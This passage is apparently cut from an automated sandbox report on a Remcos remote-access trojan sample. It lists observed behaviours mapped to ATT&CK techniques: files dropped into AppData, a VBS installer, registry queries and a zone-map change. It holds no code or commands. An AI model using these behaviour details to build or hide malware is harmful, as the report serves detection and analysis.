"T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" was detected as \"VC8 -> Microsoft Corporation\"\n \"remcos.exe.bin\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")\n \"WScript.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"Dxpserver.exe\" - Location: [%APPDATA%\\adprovider\\Dxpserver.exe]- [targetUID: 00000000-00003444]\n Dropped file: \"remcos.exe\" - Location: [%APPDATA%\\remcos\\remcos.exe]- [targetUID: 00000000-00003032]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\WSOCK32.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\VERSION.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\MPR.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\IPHLPAPI.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\UxTheme.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\WSOCK32.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\WINMM.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\MPR.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"WScript.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"schtasks.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"Dxpserver.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"remcos.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\WSOCK32.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\system32\\WSOCK32.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\VERSION.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\system32\\VERSION.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\WINMM.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\system32\\WINMM.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe.Local\\\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\COMCTL32.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\MPR.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\system32\\MPR.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\IPHLPAPI.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\system32\\IPHLPAPI.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\WINNSI.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\system32\\WINNSI.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\UxTheme.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\system32\\UxTheme.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" reads file \"c:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe.Local\\\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Windows\\system32\\UxTheme.dll.Config\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe:Zone.Identifier\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\adprovider\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Windows\\System32\\schtasks.exe:Zone.Identifier\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\006052BDCFC75E636564CC92E96237E7331A9C147F1775A3F00E681F78956A03.EXE.LOCAL\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Windows\\System32\\UXTHEME.DLL.CONFIG\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe:ZONE.IDENTIFIER\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ADPROVIDER\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Windows\\System32\\schtasks.exe:ZONE.IDENTIFIER\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\install.vbs:Zone.Identifier\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Windows\\System32\\en\\WScript.exe.mui\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\install.vbs:ZONE.IDENTIFIER\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" trying to access non-existent file \"C:\\Windows\\System32\\en\\WSCRIPT.EXE.MUI\"\n \"WScript.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WSCRIPT.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\adprovider\\dxpserver.exe\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\remcos\\remcos.exe\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\install.vbs\"\n \"WScript.exe\" writes file \"%temp%\\install.vbs\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" writes file \"%appdata%\\adprovider\\dxpserver.exe\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" writes file \"%appdata%\\remcos\\remcos.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" connecting to \"\\ThemeApiPort\"\n \"schtasks.exe\" connecting to \"\\ThemeApiPort\"\n \"Dxpserver.exe\" connecting to \"\\ThemeApiPort\"\n \"remcos.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"remcos.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"install.vbs\" has type \"data\"- Location: [%TEMP%\\install.vbs]- [targetUID: 00000000-00003092]\n \"Dxpserver.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"Dxpserver.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\adprovider\\Dxpserver.exe]- [targetUID: 00000000-00003444]\n \"remcos.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\remcos\\remcos.exe]- [targetUID: 00000000-00003032]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched file \"C:\\Windows\\System32\\en\\WScript.exe.mui\"\n \"Dxpserver.exe\" touched file \"C:\\Windows\\System32\\en\\WScript.exe.mui\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"006052BDCFC75E636564CC92E96237E7331A9C147F1775A3F00E681F78956A03\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\MOUSE\"; Key: \"SWAPMOUSEBUTTONS\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\"; Value: \"\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\\DEFAULTS\\PROVIDER TYPES\\TYPE 024\"; Key: \"NAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"Dxpserver.exe\" queries basic process information of the \"C:\\Windows\\System32\\sfc_os.dll\" (UID: 1212)\n \"Dxpserver.exe\" queries basic process information of the \"C:\\Windows\\System32\\sfc_os.dll\" (UID: 5216)\n \"remcos.exe\" queries basic process information of the \"C:\\Windows\\System32\\sfc_os.dll\" (UID: 5804)\n \"Dxpserver.exe\" queries basic process information of the \"C:\\Windows\\System32\\sfc_os.dll\" (UID: 5644)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"FindResourceW\" with parameter \"10498024\" - (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"FindResourceW\" with parameter \"10625032\" - (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"FindResourceW\" with parameter \"200\" - (UID: 00000000-00003444)\n \"WScript.exe\" called \"FindResourceA\" with parameter \"5\" - (UID: 00000000-00003092)\n \"WScript.exe\" called \"FindResourceA\" with parameter \"257\" - (UID: 00000000-00003092)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadResource with parameter {'hModule': '3145728', 'hResInfo': '3961704'}\" (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"LoadResource with parameter {'hModule': '3145728', 